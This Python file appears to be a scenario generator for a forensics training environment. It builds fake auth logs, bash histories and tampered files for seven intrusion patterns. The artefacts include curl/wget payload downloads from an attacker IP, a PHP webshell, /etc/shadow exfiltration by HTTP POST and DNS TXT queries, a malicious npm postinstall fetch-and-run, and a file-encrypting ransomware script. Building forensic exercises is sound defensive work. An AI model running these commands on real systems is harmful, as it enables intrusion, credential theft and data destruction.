forensic-shell / server /attack_patterns.py
yashppawar's picture
Upload folder using huggingface_hub
401c6f8 verified
"""
Attack pattern templates used by the scenario generator.
Each pattern is a callable `build(ctx) -> PatternArtifacts` where `ctx` is a
SimpleNamespace with fields: rng, user, ip, host, ts_base, backdoor_sha256,
backdoor_bytes, backdoor_path.
The callable returns a dict describing:
- auth_log_lines: list[str] appended to /var/log/auth.log
- bash_history: str contents of the compromised user's .bash_history
- modified_files: dict[path, content] β€” system files changed by the attacker
- modified_paths: list[str] β€” the subset the grader expects (subset of modified_files)
- timeline: list[dict(phase, detail)] β€” 5-phase kill chain for hard tier
- pattern_tag: short slug used in task_id
All timestamps are rendered relative to ctx.ts_base (a datetime) so every log
looks self-consistent. Nothing here touches global random state.
"""
from datetime import timedelta
def _fmt_ts(ts):
return ts.strftime("%b %d %H:%M:%S")
# ---------------------------------------------------------------------------
# Pattern 1 β€” SSH brute force -> wget payload -> cron persistence
# ---------------------------------------------------------------------------
def ssh_brute(ctx):
user, ip, host = ctx.user, ctx.ip, ctx.host
ts = ctx.ts_base
auth = [
f"{_fmt_ts(ts)} {host} sshd[1811]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
f"{_fmt_ts(ts + timedelta(seconds=3))} {host} sshd[1813]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
f"{_fmt_ts(ts + timedelta(seconds=7))} {host} sshd[1815]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
f"{_fmt_ts(ts + timedelta(minutes=1))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/bin/cp /tmp/.{ctx.short} /usr/local/bin/.{ctx.short}",
f"{_fmt_ts(ts + timedelta(minutes=1, seconds=5))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /etc/cron.d/{ctx.short}-sync",
]
bash = (
f"cd /tmp\n"
f"wget -q http://{ip}/payload/.{ctx.short}\n"
f"chmod +x .{ctx.short}\n"
f"sudo cp /tmp/.{ctx.short} /usr/local/bin/.{ctx.short}\n"
f"echo '* * * * * root /usr/local/bin/.{ctx.short} >/dev/null 2>&1' | sudo tee -a /etc/cron.d/{ctx.short}-sync\n"
f"history -c\n"
f"exit\n"
)
cron_path = f"/etc/cron.d/{ctx.short}-sync"
cron_content = (
f"# Managed by deploy\n"
f"0 3 * * * root /usr/local/sbin/logrotate.sh\n"
f"* * * * * root /usr/local/bin/.{ctx.short} >/dev/null 2>&1\n"
)
passwd_content = (
f"root:x:0:0:root:/root:/bin/bash\n"
f"{user}:x:1000:1000:{user.title()},,,:/home/{user}:/bin/bash\n"
f"sysd:x:0:0:System Daemon,,,:/var/lib/sysd:/bin/bash\n" # attacker-added backdoor acct
)
modified_files = {
"/etc/passwd": passwd_content,
cron_path: cron_content,
ctx.backdoor_path: ctx.backdoor_bytes,
}
timeline = [
{"phase": "login", "detail": f"ssh brute -> accepted from {ip}"},
{"phase": "recon", "detail": "whoami; id; uname -a"},
{"phase": "privesc", "detail": "sudo cp payload to /usr/local/bin"},
{"phase": "persistence", "detail": f"cron {cron_path} runs backdoor every minute"},
{"phase": "exfil", "detail": f"beacon POST to {ip}/beacon"},
]
return dict(
pattern_tag="ssh_brute",
auth_log_lines=auth,
bash_history=bash,
modified_files=modified_files,
modified_paths=["/etc/passwd", cron_path, ctx.backdoor_path],
timeline=timeline,
)
# ---------------------------------------------------------------------------
# Pattern 2 β€” stolen SSH key -> authorized_keys backdoor -> bashrc persistence
# ---------------------------------------------------------------------------
def ssh_key_theft(ctx):
user, ip, host = ctx.user, ctx.ip, ctx.host
ts = ctx.ts_base
fp = f"SHA256:{''.join(ctx.rng.choices('abcdef0123456789', k=16))}"
auth = [
f"{_fmt_ts(ts)} {host} sshd[522]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2: RSA {fp}",
f"{_fmt_ts(ts + timedelta(seconds=1))} {host} sshd[522]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo: {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.ssh/authorized_keys",
f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo: {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.bashrc",
]
bash = (
f"cat ~/.ssh/authorized_keys\n"
f"echo 'ssh-rsa AAAAB3NzaC1yc2E... attacker@stolen' >> ~/.ssh/authorized_keys\n"
f"echo 'curl -s http://{ip}/tick | bash >/dev/null 2>&1 &' >> ~/.bashrc\n"
f"chmod 600 ~/.ssh/authorized_keys\n"
f"history -c\n"
)
authorized_keys = (
f"ssh-rsa AAAAB3NzaC1yc2EA...legit-original-key {user}@laptop\n"
f"ssh-rsa AAAAB3NzaC1yc2EA...attacker-backdoor attacker@stolen\n"
)
bashrc = (
f"# ~/.bashrc\n"
f"alias ll='ls -la'\n"
f"export PATH=$PATH:/usr/local/bin\n"
f"curl -s http://{ip}/tick | bash >/dev/null 2>&1 &\n"
)
modified_files = {
f"/home/{user}/.ssh/authorized_keys": authorized_keys,
f"/home/{user}/.bashrc": bashrc,
ctx.backdoor_path: ctx.backdoor_bytes,
}
timeline = [
{"phase": "login", "detail": f"pubkey accepted from {ip} (stolen key)"},
{"phase": "recon", "detail": "cat authorized_keys; env"},
{"phase": "privesc", "detail": "already had sudo"},
{"phase": "persistence", "detail": "append attacker key to authorized_keys and bashrc"},
{"phase": "exfil", "detail": f"reverse shell to {ip} on login"},
]
return dict(
pattern_tag="ssh_key_theft",
auth_log_lines=auth,
bash_history=bash,
modified_files=modified_files,
modified_paths=[
f"/home/{user}/.ssh/authorized_keys",
f"/home/{user}/.bashrc",
ctx.backdoor_path,
],
timeline=timeline,
)
# ---------------------------------------------------------------------------
# Pattern 3 β€” webshell upload -> php drop -> curl exfil
# ---------------------------------------------------------------------------
def webshell(ctx):
user, ip, host = ctx.user, ctx.ip, ctx.host
ts = ctx.ts_base
auth = [
f"{_fmt_ts(ts)} {host} sshd[3001]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
f"{_fmt_ts(ts + timedelta(minutes=4))} {host} sudo: {user} : TTY=pts/2 ; PWD=/var/www/html ; USER=www-data ; COMMAND=/usr/bin/vim shell.php",
]
bash = (
f"curl -sO http://{ip}/shell.php\n"
f"sudo mv shell.php /var/www/html/shell.php\n"
f"sudo chown www-data:www-data /var/www/html/shell.php\n"
f"curl -s http://localhost/shell.php?cmd=id\n"
f"curl -X POST -F file=@/etc/shadow http://{ip}/drop\n"
f"history -c\n"
)
webshell_content = (
b"<?php if (isset($_GET['cmd'])) { echo shell_exec($_GET['cmd']); } ?>\n"
)
modified_files = {
"/var/www/html/shell.php": webshell_content,
ctx.backdoor_path: ctx.backdoor_bytes,
}
# ensure unique paths
if ctx.backdoor_path == "/var/www/html/shell.php":
# extremely unlikely but guard anyway
modified_files[ctx.backdoor_path] = ctx.backdoor_bytes
timeline = [
{"phase": "login", "detail": f"ssh from {ip}"},
{"phase": "recon", "detail": "ls /var/www/html; id"},
{"phase": "privesc", "detail": "sudo mv shell.php; chown www-data"},
{"phase": "persistence", "detail": "php webshell at /var/www/html/shell.php"},
{"phase": "exfil", "detail": f"curl POST /etc/shadow to {ip}/drop"},
]
return dict(
pattern_tag="webshell",
auth_log_lines=auth,
bash_history=bash,
modified_files=modified_files,
modified_paths=["/var/www/html/shell.php", ctx.backdoor_path],
timeline=timeline,
)
# ---------------------------------------------------------------------------
# Pattern 4 β€” supply-chain compromised package -> /usr/lib drop
# ---------------------------------------------------------------------------
def supply_chain(ctx):
user, ip, host = ctx.user, ctx.ip, ctx.host
ts = ctx.ts_base
pkg = ctx.rng.choice(["leftpad-js", "event-stream", "colors-fix", "pytype-helper"])
auth = [
f"{_fmt_ts(ts)} {host} sshd[901]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/npm install -g {pkg}",
]
bash = (
f"npm view {pkg}\n"
f"sudo npm install -g {pkg}\n"
f"node -e 'require(\"{pkg}\")'\n"
f"ls /usr/lib/node_modules/{pkg}/\n"
f"history -c\n"
)
postinstall = (
f"// postinstall.js -- dropped by malicious {pkg}\n"
"const { exec } = require('child_process');\n"
f"exec('curl -s http://{ip}/b -o /tmp/.{ctx.short} && chmod +x /tmp/.{ctx.short} && /tmp/.{ctx.short} &');\n"
)
modified_files = {
f"/usr/lib/node_modules/{pkg}/postinstall.js": postinstall,
ctx.backdoor_path: ctx.backdoor_bytes,
}
timeline = [
{"phase": "login", "detail": f"pubkey from {ip}"},
{"phase": "recon", "detail": f"npm view {pkg}"},
{"phase": "privesc", "detail": f"sudo npm install -g {pkg} runs postinstall as root"},
{"phase": "persistence", "detail": f"{pkg} postinstall drops /tmp/.{ctx.short}"},
{"phase": "exfil", "detail": f"backdoor beacons to {ip}"},
]
return dict(
pattern_tag="supply_chain",
auth_log_lines=auth,
bash_history=bash,
modified_files=modified_files,
modified_paths=[f"/usr/lib/node_modules/{pkg}/postinstall.js", ctx.backdoor_path],
timeline=timeline,
)
# ---------------------------------------------------------------------------
# Pattern 5 β€” insider threat: legit user exfiltrates db from internal network
# ---------------------------------------------------------------------------
def insider(ctx):
user, ip, host = ctx.user, ctx.ip, ctx.host
ts = ctx.ts_base
# insider uses internal network, not public IP, so override
auth = [
f"{_fmt_ts(ts)} {host} sshd[415]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo: {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/mysqldump --all-databases",
f"{_fmt_ts(ts + timedelta(minutes=5))} {host} sudo: {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/rsync -av /var/lib/mysql/dump.sql /tmp/.staging",
]
bash = (
f"sudo mysqldump --all-databases > /var/lib/mysql/dump.sql\n"
f"sudo rsync -av /var/lib/mysql/dump.sql /tmp/.staging/\n"
f"scp /tmp/.staging/dump.sql {user}@laptop.internal:/tmp/\n"
f"rm /tmp/.staging/dump.sql\n"
f"history -c\n"
)
dump_content = b"-- MySQL dump (exfiltrated)\nCREATE TABLE users (id INT, email VARCHAR(255));\n"
staging_content = b"-- staged copy\n" + dump_content
modified_files = {
"/var/lib/mysql/dump.sql": dump_content,
"/tmp/.staging/dump.sql": staging_content,
ctx.backdoor_path: ctx.backdoor_bytes,
}
timeline = [
{"phase": "login", "detail": f"pubkey from internal {ip} (legit creds abused)"},
{"phase": "recon", "detail": "ls /var/lib/mysql"},
{"phase": "privesc", "detail": "user already had sudo"},
{"phase": "persistence", "detail": "staging dir /tmp/.staging persists data"},
{"phase": "exfil", "detail": "scp dump.sql to laptop.internal"},
]
return dict(
pattern_tag="insider",
auth_log_lines=auth,
bash_history=bash,
modified_files=modified_files,
modified_paths=[
"/var/lib/mysql/dump.sql",
"/tmp/.staging/dump.sql",
ctx.backdoor_path,
],
timeline=timeline,
)
# ---------------------------------------------------------------------------
# Pattern 6 β€” ransomware: encrypt files + drop ransom note + cron persistence
# ---------------------------------------------------------------------------
def ransomware(ctx):
user, ip, host = ctx.user, ctx.ip, ctx.host
ts = ctx.ts_base
auth = [
f"{_fmt_ts(ts)} {host} sshd[2201]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
f"{_fmt_ts(ts + timedelta(seconds=1))} {host} sshd[2201]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/bin/bash /tmp/.{ctx.short}_enc.sh",
f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee /etc/cron.d/{ctx.short}-check",
]
bash = (
f"cd /tmp\n"
f"curl -sO http://{ip}/enc/{ctx.short}_enc.sh\n"
f"chmod +x .{ctx.short}_enc.sh\n"
f"sudo bash /tmp/.{ctx.short}_enc.sh\n"
f"echo '*/10 * * * * root /tmp/.{ctx.short}_enc.sh >/dev/null 2>&1' | sudo tee /etc/cron.d/{ctx.short}-check\n"
f"history -c\n"
)
ransom_note = (
f"=== YOUR FILES HAVE BEEN ENCRYPTED ===\n"
f"All .doc, .pdf, .xls files on this host have been encrypted.\n"
f"Send 0.5 BTC to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\n"
f"Contact: recovery-{ctx.short}@protonmail.com\n"
f"DO NOT attempt to decrypt without the key.\n"
)
enc_script = (
f"#!/bin/bash\n"
f"# {ctx.short} encryptor\n"
f"find /home -name '*.doc' -o -name '*.pdf' -o -name '*.xls' 2>/dev/null | "
f"while read f; do openssl enc -aes-256-cbc -salt -in \"$f\" -out \"$f.enc\" -pass pass:{ctx.short}; done\n"
f"echo 'encryption complete' | curl -s -X POST -d @- http://{ip}/status/{ctx.short}\n"
).encode()
cron_content = f"*/10 * * * * root /tmp/.{ctx.short}_enc.sh >/dev/null 2>&1\n"
modified_files = {
f"/tmp/.{ctx.short}_enc.sh": enc_script,
"/home/RANSOM_NOTE.txt": ransom_note,
f"/etc/cron.d/{ctx.short}-check": cron_content,
ctx.backdoor_path: ctx.backdoor_bytes,
}
timeline = [
{"phase": "login", "detail": f"ssh from {ip}"},
{"phase": "recon", "detail": "find /home -name *.doc"},
{"phase": "privesc", "detail": "sudo bash encryption script"},
{"phase": "persistence", "detail": f"cron /etc/cron.d/{ctx.short}-check re-encrypts on schedule"},
{"phase": "exfil", "detail": f"encryption status beacon to {ip}"},
]
return dict(
pattern_tag="ransomware",
auth_log_lines=auth,
bash_history=bash,
modified_files=modified_files,
modified_paths=[
f"/tmp/.{ctx.short}_enc.sh",
"/home/RANSOM_NOTE.txt",
f"/etc/cron.d/{ctx.short}-check",
ctx.backdoor_path,
],
timeline=timeline,
)
# ---------------------------------------------------------------------------
# Pattern 7 β€” DNS tunnel: exfiltrate data via DNS TXT queries
# ---------------------------------------------------------------------------
def dns_tunnel(ctx):
user, ip, host = ctx.user, ctx.ip, ctx.host
ts = ctx.ts_base
tunnel_domain = f"{ctx.short}.exfil.example.com"
auth = [
f"{_fmt_ts(ts)} {host} sshd[1101]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
f"{_fmt_ts(ts + timedelta(seconds=1))} {host} sshd[1101]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
f"{_fmt_ts(ts + timedelta(minutes=1))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/apt install dnsutils",
f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/bin/bash /tmp/.{ctx.short}_dns.sh",
]
bash = (
f"sudo apt install -y dnsutils\n"
f"cat /etc/shadow | base64 | fold -w 63 | while read chunk; do dig TXT $chunk.{tunnel_domain} +short; done\n"
f"cat /etc/passwd | base64 | fold -w 63 | while read chunk; do dig TXT $chunk.{tunnel_domain} +short; done\n"
f"echo '*/5 * * * * root /tmp/.{ctx.short}_dns.sh' | sudo tee /etc/cron.d/{ctx.short}-dns\n"
f"history -c\n"
)
dns_script = (
f"#!/bin/bash\n"
f"# DNS tunnel exfil agent β€” {ctx.short}\n"
f"for f in /etc/shadow /etc/passwd /home/*/.ssh/id_rsa; do\n"
f" [ -f \"$f\" ] && cat \"$f\" | base64 | fold -w 63 | "
f"while read c; do dig TXT \"$c.{tunnel_domain}\" +short 2>/dev/null; done\n"
f"done\n"
).encode()
cron_content = f"*/5 * * * * root /tmp/.{ctx.short}_dns.sh >/dev/null 2>&1\n"
modified_files = {
f"/tmp/.{ctx.short}_dns.sh": dns_script,
f"/etc/cron.d/{ctx.short}-dns": cron_content,
ctx.backdoor_path: ctx.backdoor_bytes,
}
timeline = [
{"phase": "login", "detail": f"ssh from {ip}"},
{"phase": "recon", "detail": "cat /etc/shadow; cat /etc/passwd"},
{"phase": "privesc", "detail": "sudo apt install dnsutils"},
{"phase": "persistence", "detail": f"cron /etc/cron.d/{ctx.short}-dns runs every 5 min"},
{"phase": "exfil", "detail": f"base64 chunks via DNS TXT to {tunnel_domain}"},
]
return dict(
pattern_tag="dns_tunnel",
auth_log_lines=auth,
bash_history=bash,
modified_files=modified_files,
modified_paths=[
f"/tmp/.{ctx.short}_dns.sh",
f"/etc/cron.d/{ctx.short}-dns",
ctx.backdoor_path,
],
timeline=timeline,
)
PATTERNS = {
"ssh_brute": ssh_brute,
"ssh_key_theft": ssh_key_theft,
"webshell": webshell,
"supply_chain": supply_chain,
"insider": insider,
"ransomware": ransomware,
"dns_tunnel": dns_tunnel,
}